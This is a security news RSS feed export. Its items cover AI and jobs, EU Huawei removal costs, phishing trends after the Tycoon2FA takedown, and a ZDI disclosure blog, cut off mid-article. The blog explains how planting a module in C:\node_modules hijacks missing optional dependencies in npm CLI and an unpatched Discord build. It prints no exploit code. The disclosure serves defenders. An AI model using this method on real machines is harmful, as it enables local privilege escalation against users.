<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=dropin+perplexity+sonar+replacement%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Sat, 01 Aug 2026 15:30:56 +0200</lastBuildDate>
<pubDate>Sat, 01 Aug 2026 15:30:56 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=dropin+perplexity+sonar+replacement%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=dropin+perplexity+sonar+replacement%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Corporate America may be using AI to cut jobs, but small businesses are using it to keep them]]></title>
<description><![CDATA[Reports of wide-scale replacement of workers by AI are overblown. Small businesses use it to help workersI recently met the owner of a company that sells windows and doors. He told me he invested about $10,000 in an AI application that is used by his salespeople in his showroom. The application l...]]></description>
<link>https://tsecurity.de/de/3695622/ai-nachrichten/corporate-america-may-be-using-ai-to-cut-jobs-but-small-businesses-are-using-it-to-keep-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695622/ai-nachrichten/corporate-america-may-be-using-ai-to-cut-jobs-but-small-businesses-are-using-it-to-keep-them/</guid>
<pubDate>Sun, 26 Jul 2026 14:16:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Reports of wide-scale replacement of workers by AI are overblown. Small businesses use it to help workers</p><p>I recently met the owner of a company that sells windows and doors. He told me he invested about $10,000 in an <a href="https://www.theguardian.com/technology/artificialintelligenceai">AI</a> application that is used by his salespeople in his showroom. The application listens to the conversations between the salesperson and the prospective customer and then automatically creates a quote for the salesperson to review and send.</p><p>“It allows my salespeople to talk to more customers and spend less time doing paperwork,” he said. “And it cuts down on errors.”</p> <a href="https://www.theguardian.com/business/2026/jul/26/small-businesses-ai">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Corporate America may be using AI to cut jobs, but small businesses are using it to keep them]]></title>
<description><![CDATA[Reports of wide-scale replacement of workers by AI are overblown. Small businesses use it to help workersI recently met the owner of a company that sells windows and doors. He told me he invested about $10,000 in an AI application that is used by his salespeople in his showroom. The application l...]]></description>
<link>https://tsecurity.de/de/3695619/it-nachrichten/corporate-america-may-be-using-ai-to-cut-jobs-but-small-businesses-are-using-it-to-keep-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695619/it-nachrichten/corporate-america-may-be-using-ai-to-cut-jobs-but-small-businesses-are-using-it-to-keep-them/</guid>
<pubDate>Sun, 26 Jul 2026 14:15:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Reports of wide-scale replacement of workers by AI are overblown. Small businesses use it to help workers</p><p>I recently met the owner of a company that sells windows and doors. He told me he invested about $10,000 in an <a href="https://www.theguardian.com/technology/artificialintelligenceai">AI</a> application that is used by his salespeople in his showroom. The application listens to the conversations between the salesperson and the prospective customer and then automatically creates a quote for the salesperson to review and send.</p><p>“It allows my salespeople to talk to more customers and spend less time doing paperwork,” he said. “And it cuts down on errors.”</p> <a href="https://www.theguardian.com/business/2026/jul/26/small-businesses-ai">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[EU's Huawei purge could cost taxpayers a staggering €40 billion, four times more than Brussels ever admitted]]></title>
<description><![CDATA[GSMA estimates Europe's Huawei removal could cost €40 billion, greatly exceeding Commission projections amid ongoing disagreement over replacement expenses.]]></description>
<link>https://tsecurity.de/de/3695495/it-nachrichten/eus-huawei-purge-could-cost-taxpayers-a-staggering-40-billion-four-times-more-than-brussels-ever-admitted/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695495/it-nachrichten/eus-huawei-purge-could-cost-taxpayers-a-staggering-40-billion-four-times-more-than-brussels-ever-admitted/</guid>
<pubDate>Sun, 26 Jul 2026 12:30:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GSMA estimates Europe's Huawei removal could cost €40 billion, greatly exceeding Commission projections amid ongoing disagreement over replacement expenses.]]></content:encoded>
</item>
<item>
<title><![CDATA[Email threats changed after the Tycoon2FA take-down]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3694766/ai-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694766/ai-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4201146/tycoon2fa-takedown-reshapes-the-phishing-landscape.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Node.js Trust Falls: Dangerous Module Resolution on Windows]]></title>
<description><![CDATA[In September of 2024, ZDI received a vulnerability submission from an anonymous researcher affecting npm CLI that revealed a fundamental design issue in Node.js. This blog details how it continues to expose applications to local privilege escalation (LPE) attacks on Windows systems, including the...]]></description>
<link>https://tsecurity.de/de/3694571/hacking/nodejs-trust-falls-dangerous-module-resolution-on-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694571/hacking/nodejs-trust-falls-dangerous-module-resolution-on-windows/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">In September of 2024, ZDI received a vulnerability submission from an anonymous researcher affecting <a href="https://docs.npmjs.com/cli/v11">npm CLI</a> that revealed a fundamental design issue in <a href="https://nodejs.org/en">Node.js</a>. This blog details how it continues to expose applications to local privilege escalation (LPE) attacks on Windows systems, including the Discord desktop app (CVE-2026-0776 0-Day), which remains unpatched and vulnerable.</p>





















  
  



<p>The issue is straightforward: when Node.js resolves modules, the runtime searches for packages in <code>C:\node_modules</code> as part of its default behavior. Since low-privileged Windows users can create this directory and plant malicious modules there, any Node.js application with missing or optional dependencies becomes vulnerable to privilege escalation.</p>




  <p class="">This issue is not new. Concerned discussions about Node.js's module search path behavior date back to <a href="https://groups.google.com/g/nodejs/c/5BGr5dliUIk/m/abJEH3sPymcJ">2013</a> and <a href="https://github.com/nodejs/node-v0.x-archive/issues/8830">2014</a>.</p><p class="">Node.js has explicitly <a href="https://github.com/nodejs/node/security/policy#uncontrolled-search-path-element-cwe-427">stated</a> that they consider this behavior intentional: </p><p class="">"Node.js trusts the file system." </p><p class="">They do not treat CWE-427 (Uncontrolled Search Path Element) as a vulnerability, pushing responsibility onto application developers. </p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png" data-image-dimensions="866x438" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=1000w" width="866" height="438" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/80c1a21b-6d10-4c27-8a9b-e05a32ee4c0b/nodejs-non-vulnerability-docs.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 1: The vendor’s security policy stance on CWE-427 as a non-issue</em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  





  <p class="">As the case studies below demonstrate, this stance has dangerous consequences. Developers are largely unaware of this attack surface, and the result is a proliferation of exploitable applications. We will show examples in npm CLI and Discord, but there are likely many more applications that are impacted by this.</p><p class=""><strong>Root Cause</strong></p><p class="">The root cause lies in the way Node.js performs module resolution. This is documented <a href="https://nodejs.org/api/modules.html#loading-from-node-modules-folders">here.</a> Although UNIX paths are used in the documentation provided by Node.js, the same logic is applied on Windows.</p>





















  
  



<p>When a Node.js application calls require(‘bar’), the runtime searches for the module in the following order:  </p>
<ol>
<li>   C:\Users\Administrator\projects\node_modules\bar.js</li>
<li>   C:\Users\Administrator\node_modules\bar.js</li>
<li>   C:\Users\node_modules\bar.js</li>
<li>   C:\node_modules\bar.js              &lt;-- The problem</li>
</ol>
<p>If the legitimate package is missing, whether due to optional dependencies, development packages removed in production, or installation failures, the resolution search will eventually reach the root of the drive. Any user can create <code>C:\node_modules</code> and place a malicious package there. Once the low-privileged user has populated <code>C:\node_modules\bar.js</code>, Node.js will load and execute it in the context of the current user. In the following case studies, we will provide evidence of how, despite properly following NPM’s <a href="https://docs.npmjs.com/cli/v11/configuring-npm/package-json#optionaldependencies">guidelines</a>, third-party dependencies end up triggering this vulnerability anytime you launch the application.   </p>
<p><b data-preserve-html-node="true">Case Studies: Real-World Manifestations</b>  </p>
<p>The Optional Dependency Pattern:
npm supports optional dependencies to be specified in the project’s package.json file. The <a href="https://docs.npmjs.com/cli/v11/configuring-npm/package-json#optionaldependencies">recommended pattern</a> for checking for these dependencies is as follows:</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png" data-image-dimensions="1051x756" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=1000w" width="1051" height="756" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4d1a598e-31cd-4ced-9047-0e80c6549174/npm-optional-dependency-docs.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 2: npm Docs showing optionalDependencies example code      </em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>This pattern silently catches errors when optional packages are missing, allowing execution to continue. So what’s the problem? On Windows, Node.js will search all the way up to <code>C:\node_modules</code> where an attacker may have planted a malicious replacement. This search behavior mirrors UNIX conventions where <code>/node_modules</code> at the filesystem root is typically only writable by root. Windows systems by default allow any user to create <code>C:\node_modules</code>. Once <code>require</code> is called, Node.js will traverse the search path and execute any matching module it finds.  </p>
<p>Important things to note:  </p>
<ol>
<li>   This pattern can be found in third party libraries deep in a dependency tree, as we will see in the following examples.  </li>
<li>   There is no runtime indication to either the developers or the end users that such a vulnerability exists without looking at the filesystem logs with Procmon.  </li>
<li>   The optional dependency pattern itself would not be dangerous if Node.js did not search for packages in <code>C:\node_modules</code>.</li>
</ol>
<p>Let’s take a deeper look at both cases and see why this is so dangerous.  </p>
<p><b data-preserve-html-node="true">Case 1: npm CLI (ZDI-26-043 / ZDI-CAN-25430 / CVE-2026-0775)</b>. </p>
<p>Prior to version 11.2.0, npm CLI used a library called “promise-inflight”, which contained an optional dependency on a package called “bluebird”. </p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png" data-image-dimensions="926x517" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=1000w" width="926" height="517" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/13612d7b-3bf5-4b03-9971-e2bf396590e1/npm-inflight-require.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 3: npm CLI repo </em><a href="https://github.com/npm/cli/blob/977fd5784f875fdc2e3436ed15c444ddca63e3d7/node_modules/promise-inflight/inflight.js#L6"><em>snippet</em></a><em> </em><a href="https://github.com/npm/cli/blob/977fd5784f875fdc2e3436ed15c444ddca63e3d7/node_modules/promise-inflight/inflight.js#L6"><em>showing</em></a><em> require call for missing bluebird package dependency</em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>When Node.js is installed on the system, npm is included by default without the <code>bluebird</code> package.  This vulnerability was introduced when bluebird was removed through a well-intentioned pull request (<a href="https://github.com/npm/cli/pull/1438/changes">https://github.com/npm/cli/pull/1438/changes</a>), demonstrating how easy it is for developers to unknowingly create this attack surface.</p>
<p>We can see Node’s package resolution logic at work in the screenshot below:</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png" data-image-dimensions="1007x497" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=1000w" width="1007" height="497" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/055eed5f-eb9e-46d7-be00-3a7c3a11631d/npm-procmon-logs.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true"><em>Figure 4: Procmon log showing the package resolution behavior of Node.js via CVE-2026-0775</em></p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>First, the application looks for the <code>bluebird.js</code> package in the Node.js installation directory. Node.js sequentially searches back to the system root until it finds the package. If an attacker has placed <code>C:\node_modules\bluebird.js</code>, the <code>require</code> call will find, read, and execute the malicious payload in the context of any user running npm on the system. </p>
<p>This vulnerability is especially dangerous because it is triggered when many <code>npm *</code> cli commands are used. Common development commands such as <code>npm install</code>, <code>npm –l</code>, and <code>npm prune</code> will all execute the malicious <code>bluebird.js</code>package.</p>
<p><b data-preserve-html-node="true">Case 2: Discord (ZDI-26-040/ ZDI-CAN-27057 / CVE-2026-0776/ UNPATCHED)</b></p>
<p>On April 22, 2025, ZDI received a report for a similar vulnerability in Discord reported by T. Doğa Gelişli. Discord uses the ws WebSocket library, which contains an optional dependency on utf-8-validate for compatibility with older Node.js versions:</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png" data-image-dimensions="1662x798" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=1000w" width="1662" height="798" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9dbb1a2-f4fc-4ef1-b1e1-3d69e0c4baa0/Screenshot+2026-04-08+at+10.59.22%E2%80%AFAM.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
          
          <figcaption data-sqsp-image-classic-block-caption-container class="image-caption-wrapper">
            <p data-rte-preserve-empty="true">Figure 5: websockets library repo snippet showing require call for missing utf-8-validate package dependency</p>
          </figcaption>
        
      
        </figure>
      

    
  


  


<p>Discord does not ship with the utf-8-validate package. As a result, the following Procmon logs show the same behavior as Case 1. Anytime Discord is launched, the attacker controlled <code>C:\node_modules\utf-8-validate.js</code> is executed.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
